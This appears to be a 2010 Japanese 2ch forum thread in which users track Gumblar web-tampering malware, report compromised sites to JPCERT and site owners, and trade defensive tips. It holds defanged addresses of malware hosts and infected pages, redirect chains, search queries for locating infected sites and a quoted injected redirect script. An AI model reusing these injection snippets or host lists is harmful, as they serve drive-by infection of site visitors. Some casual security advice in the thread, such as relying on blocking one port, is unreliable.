ttp://www.google.co.jp/search?hl=ja&q=%22.com%3A8080%2F%22%2B%22Page_View.js%22+OR+%22Parallel_Port.js%22+OR+%22Paste.js%22+OR+%22Raw_File.js%22
+OR+%22Scrolling.js%22+OR+%22Tag.js%22+OR+%22Telnet.js%22
ttp://www.google.co.jp/search?hl=ja&q=%22.com%3A8080%2F%22%2B%22Unix.js%22+OR+%22Undo.js%22+OR+%22Unfriend.js%22+OR+%22Unmount.js%22+OR+%22
Video_Card.js%22+OR+%22Webmaster.js%22+OR+%22Website.js%22+OR+%22Web_Page.js%22+OR+%22XML.js%22+OR+%22Yahoo.js%22
※「長い行ががが」と叱られたから、てきとーなとこで改行してありま。
あきた(から)ねる..
0794名無しさん@お腹いっぱい。
2010/06/19(土) 21:52:23末尾のdocument.writeがそうだと思う
0795名無しさん@お腹いっぱい。
2010/06/19(土) 22:24:100796名無しさん@お腹いっぱい。
2010/06/19(土) 22:56:370797夷塚 ◆y0JEaK6O/gDf
2010/06/20(日) 00:00:41>>795
JPCERT、IPAに報告しました
>>796
スクリプトが見当たりません…探し方が悪いのかな
0798名無しさん@お腹いっぱい。
2010/06/20(日) 00:55:56センセイに聞くと
「このサイトはコンピュータに損害を与える可能性があります。」
ソースにそれっぽいのが無いから修正済かも・・
0799名無しさん@お腹いっぱい。
2010/06/20(日) 13:55:12修正したんだろね。
0800名無しさん@お腹いっぱい。
2010/06/21(月) 12:29:07http://internet.watch.impress.co.jp/docs/news/20100621_375855.html
二匹目のドジョウ狙いらしい
0801名無しさん@お腹いっぱい。
2010/06/21(月) 20:38:26ttp○//as○sr○impact-ad○jp/hserver/
ってJavaScriptがあやしい・・・
0802名無しさん@お腹いっぱい。
2010/06/21(月) 21:45:30www.google.co.jp/search?q=%22impact-ad.jp%22
広告のようだけど、あやしいってのは具体的に?
アクセスしてみる限りは、ウェブ改竄の不正コードはない
>>800
国内サイトは十数件ぐらいやられたかんじ
www.google.co.jp/search?lr=lang_ja&q=%22in/yahoo.js%22&num=50
0803名無しさん@お腹いっぱい。
2010/06/21(月) 22:01:00801だが 1つの記事見てる間にクリック音が何回か鳴って
IE8左上の戻るサイト一覧のところにttp○//as○sr○impact-ad○jp/hserver・・・
があったからどうしたのかと思って
MSEでフルスキャンしたら何もウイルスは見つからなかった
0804名無しさん@お腹いっぱい。
2010/06/21(月) 23:26:12トラッキングクッキーに反応しただけだと思わr
0805名無しさん@お腹いっぱい。
2010/06/22(火) 11:09:45DELLで買った奴だからプリインストール版入ってて、コンパネで消したけど不安だよ
ここには対処法は「削除用外部ソフトウェアインスコでおk」で片づけられてるし……
初見には外部ソフトウェアは怖い
0806名無しさん@お腹いっぱい。
2010/06/22(火) 13:27:39www●akuriru●jp
見た感じは8080っぽくないけど、jsファイルが危険すぎワロタ
Web_Page.js \(^o^)/
0807名無しさん@お腹いっぱい。
2010/06/22(火) 16:03:060808名無しさん@お腹いっぱい。
2010/06/22(火) 16:49:29これも絶対じゃないからなぁ
0809名無しさん@お腹いっぱい。
2010/06/22(火) 17:17:20aguseはスルーもあるよ
0810名無しさん@お腹いっぱい。
2010/06/22(火) 17:45:13http://journal.mycom.co.jp/news/2010/06/18/019/
関係ないか…
0811名無しさん@お腹いっぱい。
2010/06/22(火) 17:49:13これみたいなもんだろ?
0812名無しさん@お腹いっぱい。
2010/06/22(火) 17:53:26確かgredもスルーするよな、ウイルスの特性上普段見てるサイトが次の日感染してて……なんてこともあり得るわけだから
恐ろしいったらありゃしない
>>807
外部ソフトウェアわざわざ使わなきゃいけないってのが不安なんだよ……
「プリインストールはコンパネで削除だけじゃむだ」と言って理由を聞かれると「レジストリに残骸が〜」といつもあいまいに返して、その残骸の詳細はまったく出てこない
0813名無しさん@お腹いっぱい。
2010/06/22(火) 17:59:05簡易型のリーダーがプラグインとしてインスコされてた。
IEで開くよりは軽い気がする。
0814名無しさん@お腹いっぱい。
2010/06/22(火) 18:02:31ほうほう、Chrome OSに向けて着々と機能増やしてるね
0815名無しさん@お腹いっぱい。
2010/06/22(火) 18:35:31そもそもDELLにも残骸残ることが確定なの?
あれはNECの一部だけじゃないの?
相当古い機種じゃなきゃあんな変なプリインストールなくね?
0816名無しさん@お腹いっぱい。
2010/06/22(火) 18:46:40「残骸が残る」としか過去に言われてないからそこまで解らないんだ
そもそも残骸がどんなのか、どこにあるのか、regedit.exeで見たらどう映るのか
ただ「残骸あるある」だけでそこから先が全く話に出てないから……
0817名無しさん@お腹いっぱい。
2010/06/22(火) 18:52:58それっぽい単語でレジストリ検索してもでないならどうしようもなくね
そんな見えないもんに震えてないでDELLのサポートにでも聞けばいいんじゃないの
0818名無しさん@お腹いっぱい。
2010/06/22(火) 19:03:43期限切れた、アンインスコ済み、そもそも「それっぽい単語」ってのも初見にはサッパリ……
過去ログ読んで知ってそうな「残骸あるある」さんのログ見てもホントに「残骸あるよ」「メーカ品は残骸ある」のゴリ押しだけだし……
0819名無しさん@お腹いっぱい。
2010/06/22(火) 19:49:34javaくらい思いつかないか?
レジストリじゃなくてもとりあえずjava.exeをファイル検索してみる程度はやったの?
調べる気もなく過剰に心配してるだけならPC捨てるのが一番安全だよ
しかもDELLってだけで他の情報は隠蔽されてるから調べようがない
そもそも本当にそれはプリインストールされていたの?
この方法でOS入れなおせば余計なソフトははいらないっぽいけどどうなんだろ
http://supportapj.dell.com/support/topics/global.aspx/support/dsn/en/document?docid=179256#Issue8
0820名無しさん@お腹いっぱい。
2010/06/22(火) 21:36:49とりあえずjava.exe検索したらwindows\system32とprogramfile\jre6\binに一つずつあった
どっちも作成日時は2010/04/16だった
0821名無しさん@お腹いっぱい。
2010/06/22(火) 21:45:36こちらは2005/11/10です
0822名無しさん@お腹いっぱい。
2010/06/22(火) 21:48:020823名無しさん@お腹いっぱい。
2010/06/22(火) 21:53:31>>792
因みに、akuriru●jpは再発だw
渡辺司法書士はこっそり修正後、告知しないで隠蔽かにゃ?
search●yahoo●co●jp/search?p=%22●com%3A8080%2FWebmaster●js%22&ei=UTF-8&fr=top_ga1_sa&x=wrt&meta=fl%3D3
0824名無しさん@お腹いっぱい。
2010/06/22(火) 21:58:21こっそりなおしてる
0825名無しさん@お腹いっぱい。
2010/06/23(水) 02:47:36以下は通常JREインストールで入るjava.exe
> windows\system32とprogramfile\jre6\bin
java.exeを右クリック→プロパティからバージョンは確認できる
日付も新しいようだしまだこれはインストールされてるんじゃね
c\i386はリカバリ領域かなんかじゃないかと
0826名無しさん@お腹いっぱい。
2010/06/23(水) 08:33:52アドバイスありがとうございます
そちらの二つは両方とも「6.0.200.2」と最新でした
c\386は「5.0.60.5」でしたが、ググってみるとクリーンインストール用CDの予備みたいなものだと判明
実影響は無いようなので、実質プリインストールの残骸は無い、と見ても大丈夫ですか?
0827名無しさん@お腹いっぱい。
2010/06/23(水) 14:35:45ここで大丈夫と言っても何の保証もないんであとは自分で判断してください
0828名無しさん@お腹いっぱい。
2010/06/23(水) 18:16:550829名無しさん@お腹いっぱい。
2010/06/23(水) 23:51:35多重トラップ注意
0830名無しさん@お腹いっぱい。
2010/06/24(木) 01:30:24>まず、感染したかどうかは>>2のチェッカーで確認しましょう
これはどういう意味なのでしょうか?
>>2のリンク先をクリックすれば良いのですか?
0831名無しさん@お腹いっぱい。
2010/06/24(木) 02:28:140832名無しさん@お腹いっぱい。
2010/06/24(木) 02:42:27>>4よめ
感染したかについてはスキャンしてなにか出てきたら当たりかもしれない
0833名無しさん@お腹いっぱい。
2010/06/24(木) 08:25:34自分で調べるのが一番。
0834名無しさん@お腹いっぱい。
2010/06/24(木) 09:34:43おめでとう
0835名無しさん@お腹いっぱい。
2010/06/24(木) 12:03:35,―==7 Congratulation! コングラッチュレーション
|く ___ _> Congratulation!
fll`ーU+'
`''、 ー=| おめでとう・・・・・・・・!
_,,..-´:|ヽー-;ー..,,_
. ,−=-, ,,..-‘≡≡:| ><´|≡::|ヽ おめでとう・・・・・・・・! おめでとう・・・・・・・・!
. | l____ヽ.|≡l≡≡≡| |::| |≡:::/::|
. |(llー´_ヽ|≡|≡≡≡|.|:::|l≡::/::::| おめでとう・・・・・・・・・・・・!
.. 4 l__`=|_|≡:|≡≡≡::||:::|'≡/≡|
/|\,.・|::≡:|ヽ|≡≡≡≡≡:::/|≡::| _,,.........、
≡|/}:ヽ|:≡|::::|{≡≡≡≡≡:::{ .|≡::| ヽ_,, ヽ
≡:| |:::|l≡:|≡|:|≡≡≡≡≡:::|. .|≡::| /_> |
:::≡l|:::|'≡:|≡:|::|≡≡≡≡≡:::|. .|≡::| |7 llう.. |
≡≡≡≡/|≡ヽ≡≡≡≡≡::::|. ..|≡::|. z-..,〃、 ム__ ll´.. |
::≡≡≡::/ ヽ≡ヽ≡::|―、≡≡::l ..|≡::| / ミ 1´/ヽ==,...
::≡≡≡| \≡ヽ::| ヽ≡≡l .ljヽl | 刀、ミ _,,,..-`‐三=ー-
::≡≡≡| |ヽ/ー.、.. ヽ≡≡l. .|/ | ノ= ∠i /ヽ、≡≡≡≡≡
:|¬、≡≡ヽ. |≡ゞー=ッ |≡≡| __/ (ll ー゜\|ヽ. /≡::ヽ≡≡≡≡≡
:| ヽ≡≡ヽ |≡≡ヽミ. |≡≡| l|. ll7| ヽu=/l二ll二l'''ヽ /≡:::/≡≡≡≡≡
0836名無しさん@お腹いっぱい。
2010/06/24(木) 13:23:57マジで初心者にも分かるgumblerスレないよな
これじゃ身内同士だけで身を固めてるだけで「騒ぎ収まらないねー」と愚痴っても
そりゃ収まらんわって気が
wikiも現行版に完全に通用しない古い情報ばかりだしな……
0837名無しさん@お腹いっぱい。
2010/06/24(木) 14:33:410838名無しさん@お腹いっぱい。
2010/06/24(木) 15:16:48そんな狭い規模で起きてるわけじゃないんで
ここがどんなにがんばろうがそれだけで収まるようなもんじゃないよ
初心者スレなんて立ててもバカが混乱したレスするだけで何もならないだろ
同人板がまさにそんな感じだったはず
wikiは見てないから知らんけど変えたいならお前が変えてやれば良いんじゃね
初心者用ならこういうのが良さそう
http://www.so-net.ne.jp/security/news/newstopics_201005.html
http://www.so-net.ne.jp/security/news/newstopics_201001.html
0839名無しさん@お腹いっぱい。
2010/06/24(木) 15:41:01いや、「騒ぎ収まらないねー」ってぼやいてる人達が滑稽に見えただけさ
俺個人はもう対策終えてるし自分の警戒で手いっぱいだから
そこからさらに慈善事業やろうとは思わない
まぁここですらまともな人が来るまで「パソコン捨てれば?」等の問題外な返しで埋まってる事もあるしな……
テンプレまで改竄されて犯罪まがいの事まで起きるし
ID出ない板故致し方なしか
0840名無しさん@お腹いっぱい。
2010/06/24(木) 15:52:27そりゃ誰でも疲れてPC捨てろという程度の回答になるのは仕方ないんじゃね
まともな質問ができなきゃまともな回答にはならない
まともな人が来るっていうのは要するに
そのときまでのパソ壊れた助けて攻撃に心が折れてない人が来るってことじゃないかと
テンプレ改ざんは別件だけども
0841名無しさん@お腹いっぱい。
2010/06/24(木) 17:11:50それでもそんなアホな返しをしちゃったら「まともな質問しない奴」と同レベルになっちゃうワケで
傍から見れば同レベルにしか見えない
そういうのはスルーでいいんだぜ……?
テンプレ改竄はどうにかならんかな……
0842名無しさん@お腹いっぱい。
2010/06/24(木) 20:06:350843名無しさん@お腹いっぱい。
2010/06/24(木) 21:27:10www4●ocn●ne●jp/~hanko/ ←はんこや 連絡するが対処せず
www1●ocn●ne●jp/~orchid08/sub5●html ←不動産屋 連絡するが対処せず
www16●ocn●ne●jp/~nisikawa/
www17●ocn●ne●jp/~hidib●j/sirase●html
www2●ocn●ne●jp/~hcy/ryoukin●html (gumblar x)
www2●ocn●ne●jp/~lakeside/
OCNの対応は非常に遅い
0844名無しさん@お腹いっぱい。
2010/06/24(木) 21:41:57どこにある?
0845名無しさん@お腹いっぱい。
2010/06/25(金) 06:35:40ttp://img189.imageshack.us/flvplayer.swf?f=Mgumblaritwb2&autostart=true
0846名無しさん@お腹いっぱい。
2010/06/25(金) 16:57:30www●wedia-t●com
0847名無しさん@お腹いっぱい。
2010/06/25(金) 21:21:38対応するのはOCNじゃなくてそこを使ってる利用者だろ・・・
0848735
2010/06/25(金) 22:17:18ttp://www.maizurusou.co.jp/topics/index.html
0849名無しさん@お腹いっぱい。
2010/06/26(土) 11:08:02https://www-950.ibm.com/blogs/tokyo-soc/entry/mshelp0day_20100625?lang=ja
0850八頭 ◆YAGApwSaEw
2010/06/26(土) 11:09:080851コテハン ◆8080adndqg
2010/06/26(土) 13:17:08www●hugoinc●us/PDF ←意味不
blog●nadamori●com/ ←新型の「.info:8080」
p-asahi●com/shop/rss/
.biz:8080は来るかな?
0852八頭 ◆YAGApwSaEw
2010/06/27(日) 14:23:45dogforums●com
0853名無しさん@お腹いっぱい。
2010/06/27(日) 14:48:380854名無しさん@お腹いっぱい。
2010/06/27(日) 16:53:29www●ff●iij4u●or●jp/~ceh/lvvl/ferachan
www●daini-survey●com/xmlrpc●php
www●soul-wave●jp/RAYCA/
0855名無しさん@お腹いっぱい。
2010/06/27(日) 22:25:220856名無しさん@お腹いっぱい。
2010/06/27(日) 23:50:010857名無しさん@お腹いっぱい。
2010/06/27(日) 23:54:080858コテハン ◆8080adndqg
2010/06/28(月) 00:00:58www●cb-med●jp/jb/?a=ds&Id=71
電話番号の8080に引っ掛かってきたw
0859名無しさん@お腹いっぱい。
2010/06/28(月) 04:51:590-dayコードがいきなり大量攻撃に使われることはあまり無いな
0860名無しさん@お腹いっぱい。
2010/06/28(月) 07:14:000861名無しさん@お腹いっぱい。
2010/06/28(月) 11:38:22とりあえず危険なコードをまとめたtxtファイルなりwikiなりがあると助かるな
0862名無しさん@お腹いっぱい。
2010/06/28(月) 13:22:23悪用されることが目に見えてるよ
ついでにコード自体は難読化されてることも多いんでまとめる意味が無い
被害サイト見てもわからないならわからないとおもう
0863名無しさん@お腹いっぱい。
2010/06/28(月) 14:37:40メールのリンクをクリック
↓
リンク先から com;8080、info;8080 へリダイレクト
↓
index.phpを読み込む
↓
pdfとJREファイルをダウンロードしてローカルで実行される
改ざんされたサイトよりも、メールを送りつけられる方が増えてるな…。
SPAMメールなのにリンクをクリックしちゃうユーザが多すぎて困る
0864名無しさん@お腹いっぱい。
2010/06/28(月) 14:56:310865名無しさん@お腹いっぱい。
2010/06/28(月) 18:45:34〜JPCERTが注意喚起
http://www.rbbtoday.com/article/2010/06/28/68725.html
対象となる製品とバージョンはWindows XP Service Pack 2および
Windows XP Service Pack 3、Windows XP Professional x64 Edition Service Pack 2
Windows Server 2003 Service Pack 2、Windows Server 2003 x64 Edition Service Pack 2
Windows Server 2003 with SP2 for Itanium-based Systemsの5種。
28日現在、マイクロソフト社より本件に関するセキュリティ更新プログラムは
公開されていないため、軽減策として、HCPプロトコルの登録の解除が提示されている。
また本軽減策を自動的に適用するための“Microsoft Fix it”も公開中とのこと。
0866名無しさん@お腹いっぱい。
2010/06/28(月) 20:44:34送信ドメイン認証でスパム判定してるから、そういったメールは読まないな
送信ドメイン認証NG→ホワイトリストにはいってる特定アドレス以外はデフォルトでスパムメールと判断
でいいんじゃね?
0867夷塚 ◆y0JEaK6O/gDf
2010/06/29(火) 00:06:03>>850以降で書き込まれていたURLで、現時点でも
ウイルスが仕込まれているサイトにはメル凸しました
英語サイトはスルー
>>849
http://www.virustotal.com/analisis/167501b07f0cafb8dc73ef4bd0d7ea4640725c7f6a28ac69ccb33a11ec0db2b5-1277714205
http://www.virustotal.com/analisis/ea1eb23873efbb6cba1644ceee736a1977a386dd01105ecc7d39882301a651a0-1277714313
AviraはNotes1をマルウェアと認定している模様
Avastからは反応なし、対応済みなのかな?
0868夷塚 ◆y0JEaK6O/gDf
2010/06/29(火) 16:39:28> org:8080/File●js
> biz:8080/File●js
0869名無しさん@お腹いっぱい。
2010/06/30(水) 02:29:130870名無しさん@お腹いっぱい。
2010/06/30(水) 02:39:500871名無しさん@お腹いっぱい。
2010/06/30(水) 16:56:330872名無しさん@お腹いっぱい。
2010/07/01(木) 07:27:55yamaga-blanks●com/gazoup2/index●php?mode=rss
yokohamac●com/info/
yokohamac●com/info/?feed=rss2&p=17
0873名無しさん@お腹いっぱい。
2010/07/01(木) 14:56:29ITホワイトボックスII「脅威!ガンブラーウイルスの正体」
0874夷塚 ◆y0JEaK6O/gDf
2010/07/01(木) 15:49:44メル凸済み、反応待ち
www.itmedia.co.jp/enterprise/articles/1007/01/news022.html
随分めんどくさい事になってるようですね
0875名無しさん@お腹いっぱい。
2010/07/01(木) 20:47:06乙
yokohamacは403になってるもよー。
yamaga-blanksにメルポした。
0876名無しさん@お腹いっぱい。
2010/07/01(木) 23:29:58たった25分?
0877名無しさん@お腹いっぱい。
2010/07/01(木) 23:58:42ウェブページの改ざん方法から感染させられるウィルスの情報まで一緒くたでよく分からんかった。
とりあえず、セキュリティーツールという偽アンチウィルスソフトの画面が見られて、ふぅんとは思えた。
0878名無しさん@お腹いっぱい。
2010/07/02(金) 00:05:240879名無しさん@お腹いっぱい。
2010/07/02(金) 00:22:240880名無しさん@お腹いっぱい。
2010/07/02(金) 00:28:44こっちも録画してアップするか、テキストに書き起こしてみる。
0881名無しさん@お腹いっぱい。
2010/07/02(金) 00:45:320882名無しさん@お腹いっぱい。
2010/07/02(金) 01:44:310883名無しさん@お腹いっぱい。
2010/07/02(金) 08:45:38drive-by-downloadなんて大昔からあるんだけど、
セキュ関係も説明すんのめんどくさくなって
「いわゆるgumlar」で済ませてる所が多い。
0884名無しさん@お腹いっぱい。
2010/07/02(金) 18:57:08見るのを忘れましたorz
再放送も見逃すかも(´・ω・`)
ttp://www.nhk.or.jp/itwb/2/programme/
■ 放送予定
7月3日(土)午前5:00〜
「脅威!ガンブラーウイルスの正体」BS2
7月4日(日)午後2:00〜
「脅威!ガンブラーウイルスの正体」教育
0885夷塚 ◆y0JEaK6O/gDf
2010/07/02(金) 21:08:17チェック乙です
「yamaga-blanks●com/gazoup2/」も404みたいですね
そしてGumblar特集を放映してた頃に漁ってたもの
topious●fairwaydrycleaners●net:8080/Scanner●js
topious●fairwaydrycleaners●net:8080/Gnutella●js
topious●fairwaydrycleaners●net:8080/Vector_Graphic●js
huio●e-solutionsystems●net:8080/Hard_Disk●js
.jsに繋がらないので正直何とも言えませんが、一応報告だけ
0886名無しさん@お腹いっぱい。
2010/07/02(金) 21:11:10じゃあモンブラン
0887名無しさん@お腹いっぱい。
2010/07/02(金) 21:20:170888名無しさん@お腹いっぱい。
2010/07/02(金) 23:54:10乙
whoisからめるぽすた。
0889名無しさん@お腹いっぱい。
2010/07/03(土) 15:22:140890名無しさん@お腹いっぱい。
2010/07/03(土) 16:19:18ゲームでもwiki系HPならまだ大丈夫……か?詳しくないから解らん
0891名無しさん@お腹いっぱい。
2010/07/03(土) 16:39:120892名無しさん@お腹いっぱい。
2010/07/03(土) 17:08:50>ゲームでもwiki系HPならまだ大丈夫……か?詳しくないから解らん
分からないなら、いい加減なこと言うなよカス。
0893名無しさん@お腹いっぱい。
2010/07/03(土) 18:05:43リンク先がどっかのエロサイトに変えられるとかザラだよな
0894名無しさん@お腹いっぱい。
2010/07/03(土) 18:16:08お前もお前で一言多いがな
0895名無しさん@お腹いっぱい。
2010/07/03(土) 18:40:39修正確認
Last-Modified: Sat, 03 Jul 2010 03:16:25 GMT
0896名無しさん@お腹いっぱい。
2010/07/03(土) 19:31:50ゲームアーツとかGAMESIDE関連のサイトがやられた過去があるから
大手公式サイトでも油断は禁物
0897名無しさん@お腹いっぱい。
2010/07/03(土) 20:16:500898名無しさん@お腹いっぱい。
2010/07/04(日) 02:11:04どこも危ない
0899夷塚 ◆y0JEaK6O/gDf
2010/07/04(日) 04:06:14しかしいつから埋まってたんだろう
>>889
絶対安全といえるサイトは正直何処にもないですね
FTPの接続先がどんな内容かなんてお構いなしですから
ふと思う、コミックマーケットも近いこの時期にシャッター前サークルや
出展企業の公式サイトが陥落したらと思うとなかなか恐ろしいものが…
0900八頭 ◆YAGApwSaEw
2010/07/04(日) 13:34:51ttp://i50.tinypic.com/fw81l3.jpg
0901名無しさん@お腹いっぱい。
2010/07/04(日) 17:36:080902名無しさん@お腹いっぱい。
2010/07/04(日) 18:19:13一般ユーザー涙目ってレヴェルじゃないな……
ところでブラウザのIE8なんだが、インターネットオプションの「ページの自動読み込み」はどうするべきなんだろうか
これつけっぱなしだと感染してるURLのハイパーリンクに触れただけで読み込まれてしまう?
0903名無しさん@お腹いっぱい。
2010/07/04(日) 21:30:10> HCPプロトコル云々
それFix it出てる
http://support.microsoft.com/kb/2219475
0904名無しさん@お腹いっぱい。
2010/07/05(月) 01:40:42こういう裁判起こすWeb制作会社にびっくりした
0905夷塚 ◆y0JEaK6O/gDf
2010/07/05(月) 03:52:42→peer●webserviceaan●ru/js●js
→109●196●134●58/ssl●html
→cache●globalforexnet●com:8080/index●php?pid=6
>>900
仰りたい事が理解できてるか正直不安ですが、ystat.jsの事でしょうか?
間違ってたらごめんなさい
>>902
リンク先読みは無効にしちゃってもいいんじゃないでしょうか
0906八頭 ◆YAGApwSaEw
2010/07/05(月) 20:53:11これは2008年のお話
ttp://i45.tinypic.com/21j2340.jpg
0907八頭 ◆YAGApwSaEw
2010/07/05(月) 20:55:56US留め
0908名無しさん@お腹いっぱい。
2010/07/05(月) 21:36:31「Adobe Flash Playerは潜在的に危険な操作を停止しました。
お客様のコンピューターまたはネットワークで次のローカルアプリケーション
(ここに保存したwebページのローカルアドレスが入ってます)
はインターネット接続が有効になっている次の場所と通信しようとしています
ai.yimg.jp
このアプリケーションがインターネット通信できるようにするには、
「設定」をクリックしてください。
設定の変更後アプリケーションを再起動する必要があります」
というダイアログが出てきます、これはweb改竄ウイルスでしょうか?
怖いので何もいじくってません
0909908
2010/07/05(月) 21:38:210910名無しさん@お腹いっぱい。
2010/07/05(月) 21:48:510911名無しさん@お腹いっぱい。
2010/07/05(月) 21:59:160913名無しさん@お腹いっぱい。
2010/07/06(火) 01:23:58修正したみたい。>楽
0914夷塚 ◆y0JEaK6O/gDf
2010/07/06(火) 09:40:07「その問題はとうの昔に起きていますよ」
というご指摘をされてるんだなと解釈してたんですが…
なんか的外れな事を言ってる気がしてきましたorz
>>913
チェック乙です
精査まではしてませんけど、aguseで見た限りは大丈夫そうですね
0915名無しさん@お腹いっぱい。
2010/07/06(火) 15:16:080916名無しさん@お腹いっぱい。
2010/07/06(火) 15:31:060918名無しさん@お腹いっぱい。
2010/07/06(火) 17:00:56心配なら設定ページで開かないようにすればいい
0919名無しさん@お腹いっぱい。
2010/07/06(火) 18:46:498080に接続できないようにPFWで設定しておけば良いのですか?
0920名無しさん@お腹いっぱい。
2010/07/06(火) 20:19:46あれれ、
「00_css/default.asp」以外にもあるのか。。。
「.ru/js.js」があったときのソース。(注意:アンチウイルスがソースに反応する場合があります。)
http://megalodon.jp/2010-0705-0530-51/www.dan.co.uk/viewsource/index.php?url=http%3A%2F%2Fwww.lalacha.com%2F00_css%2Fdefault.asp
いま、撮ったソース。
http://megalodon.jp/2010-0706-2009-42/www.dan.co.uk/viewsource/index.php?url=http%3A%2F%2Fwww.lalacha.com%2F00_css%2Fdefault.asp
0921名無しさん@お腹いっぱい。
2010/07/06(火) 20:24:36>>2を見てURLチェッカーでURL調査しようね^−^
0922名無しさん@お腹いっぱい。
2010/07/06(火) 20:25:37>>917
見つけました。
そこだけ削除したんか。。。
もいちどメル逝ってきまつ。。。
0923名無しさん@お腹いっぱい。
2010/07/06(火) 20:30:24別のアドのads.jsになってた。。。
http://megalodon.jp/2010-0706-2027-14/www.dan.co.uk/viewsource/index.php?url=http%3A%2F%2Fwww%2Elalacha%2Ecom%2Finfo%2Fstockdiarylist%2Easp
0924sage
2010/07/06(火) 23:04:18データベースを修正すれば全部解決
またやられれば、あちこちにまた挿入…ってことになりますね
0925名無しさん@お腹いっぱい。
2010/07/07(水) 00:41:55http://pc11.2ch.net/test/read.cgi/sec/1278430098
テンプラは改竄されなかったけd(ry
0926名無しさん@お腹いっぱい。
2010/07/07(水) 01:34:37メルすたお。
>>924
なんですとぉー。。。
>>905でこちらでもcom:8080へ逝ったの確認すたのでしが。。。orz......
0927名無しさん@お腹いっぱい。
2010/07/07(水) 01:53:42×com:8080へ逝った
○109●196●134●58/ssl●htmlまで逝けてcom:8080へ飛ばそうしてた
com:8080は蹴られたん。
0928名無しさん@お腹いっぱい。
2010/07/07(水) 02:29:49それで問題ないし感染を防げる
こんな下らんものに感染するのは素人だけ
買ってきたパソコンをそのまま使ってるカス
0929名無しさん@お腹いっぱい。
2010/07/07(水) 08:35:25常に相手を見下して優越感に浸ってないと気が済まない人種なんだろうか……
あと>>925乙
0930名無しさん@お腹いっぱい。
2010/07/07(水) 10:35:530931名無しさん@お腹いっぱい。
2010/07/07(水) 10:54:18最近はルーターとかウイルスソフト入れて対策してるから大丈夫のようです
0932名無しさん@お腹いっぱい。
2010/07/07(水) 11:06:06感染してる人を見つけて報告するのが目的ですし
今まで通り仲良くやりましょうよ
>>925乙
0933名無しさん@お腹いっぱい。
2010/07/07(水) 11:52:47ブラウザが外部の80と443に接続できるよう許可を与え
8080に接続できないようにPFWで設定しておけば良いのですか?
0934名無しさん@お腹いっぱい。
2010/07/07(水) 14:02:19http://www.gigafree.net/security/antivirus/browserguard.html
0935名無しさん@お腹いっぱい。
2010/07/07(水) 15:02:460936夷塚 ◆y0JEaK6O/gDf
2010/07/07(水) 15:13:06www●infini+ypm●jp/shale52●html
→<scr ipt>location = 'h++p://thesuperviagra●com/';</scr ipt>
バリュードメイン…orz
0937名無しさん@お腹いっぱい。
2010/07/07(水) 18:15:31>>928
8080はウィルス作者が仮につけたもんだから、
今後81とか444とか勝手に変わるかも知れない
現状、確かにそれで感染しにくくはなるが
それは完璧な対応ではない
こういう過信してる奴こそ危ない
初期ガンブラーはtcp80そのものじゃなかったっけ?
0938名無しさん@お腹いっぱい。
2010/07/07(水) 18:29:17どういった対策を取っているの?
AVGとかカスペで定期的にスキャンしてれば良いですか?
0939名無しさん@お腹いっぱい。
2010/07/08(木) 09:02:58ブラウザは、IE8(保護モードオン)もしくはChrome
これでしょ?
OS/ブラウザレベルで0-dayでもやられなくしたうえで、さらにウイルス対策ソフトで念のために防御
0940名無しさん@お腹いっぱい。
2010/07/08(木) 15:51:18今まで2chのログファイルの中のコードが反応したくらいで
後は何も検出されたことないな・・・
何もないので逆に不安になるwww
0941名無しさん@お腹いっぱい。
2010/07/08(木) 21:02:290942名無しさん@お腹いっぱい。
2010/07/08(木) 21:18:40それには反応した
言うの忘れてた・・・スマソ
0943名無しさん@お腹いっぱい。
2010/07/09(金) 06:49:34さっきここ開いたら
「ヘルプとサポートセンター」が開いて
よく分からないプログラムのような文字列が表示された。
>>865に書かれてる最新Gumblarかな?
0944名無しさん@お腹いっぱい。
2010/07/09(金) 09:59:14Vista以降でも脆弱性がないだけで「ヘルプとサポートセンター」は開くってこと?
XPならこの脆弱性だけでもシステムいじられるみたいだからマズイよなあ
ttp://www.smilebanana.com/archives/2010/06/29-2302.php
0945名無しさん@お腹いっぱい。
2010/07/09(金) 11:46:17昨夜、上のアドレスを開いたら
MSIE Java Deployment Toolkit Input Invalidation
MSIE ADODB.Stream Object File Installation Weakness
の2個が
侵入の試みを遮断しました。と出ました
完全スキャンもしたんですが、何も出ませんでした。
XP ノートンです。
0946943
2010/07/09(金) 12:23:53自分はXPでIE6を使ってます。
で、そのサイトを踏んだら
「ヘルプとサポートセンター」が開きそこにプログラムのような文字列が表示されました。
(そのまま開きっぱなしでその後の変化何も無し)
その後、複数社オンラインスキャンしましたが何も見つかりませんし
Gumblar/GENOのまとめサイトも見て色々探してみましたが怪しいものは何もありません。
それに944さんが教えてくれたサイトを見ると
『「ヘルプとサポートセンター」の画面が表示されてすぐに消え、同時にJavaのアイコンがタスクバーに現れる』
とのことなので、もしかしてギリギリ感染していないのでは?
とちょっと思いました。
でも全く同じ状況ではないですしもう少し調べてみようと思います。
(最悪の場合リカバリした方がよいかな、とも考えています)
ありがとうございました。
0947名無しさん@お腹いっぱい。
2010/07/09(金) 16:59:56セキュリティに関するアップデートはないようだ
0948名無しさん@お腹いっぱい。
2010/07/09(金) 17:43:23つーか何故誰もこの改竄やってるバカを捕まえないんだ?
他のウイルス作者はガンガン捕まってるというのに…
これだけ就活とか会社の営業に悪影響を与えているんだから
国レベルで捕まえるのが普通だろうに
0949名無しさん@お腹いっぱい。
2010/07/09(金) 17:53:06> いつになったらこのウイルスから解放されるの?
このウイルスが収束しても似たのが出てくる
実際いまはすでに亜種いろいろ
> つーか何故誰もこの改竄やってるバカを捕まえないんだ?
亜種も含めてたくさんいます
> 他のウイルス作者はガンガン捕まってるというのに…
そうでもないだろ
> これだけ就活とか会社の営業に悪影響を与えているんだから
> 国レベルで捕まえるのが普通だろうに
国レベルで捕まえるって例えばどんなふうにやるの?
就活は個人の問題
会社もPC管理がおろそかなとこが問題になってるだけ
0950名無しさん@お腹いっぱい。
2010/07/09(金) 20:17:19去年の12月23日ころくらいから新型が話題になったんだっけ?
そのときアドビがもっとしっかりと対応していれば・・・
あんまり変わらなかったのかも知れないけど
0951夷塚 ◆y0JEaK6O/gDf
2010/07/10(土) 01:15:46> 弊社サイトのウイルス感染に関するお詫びとお願い
0952名無しさん@お腹いっぱい。
2010/07/10(土) 01:39:11> わりとどうでもいい <
 ̄^Y^Y^Y^Y^Y^Y^Y^Y^Y^Y^Y^Y^^Y^ ̄
ヘ(^o^)ヘ
|∧
/
0953名無しさん@そうだ選挙に行こう
2010/07/10(土) 17:15:09&契約時の条件にウイルス対策ソフトウェアいれて最新に更新したPCから更新することっていれてるぞ
0954名無しさん@そうだ選挙に行こう
2010/07/10(土) 17:40:370955名無しさん@そうだ選挙に行こう
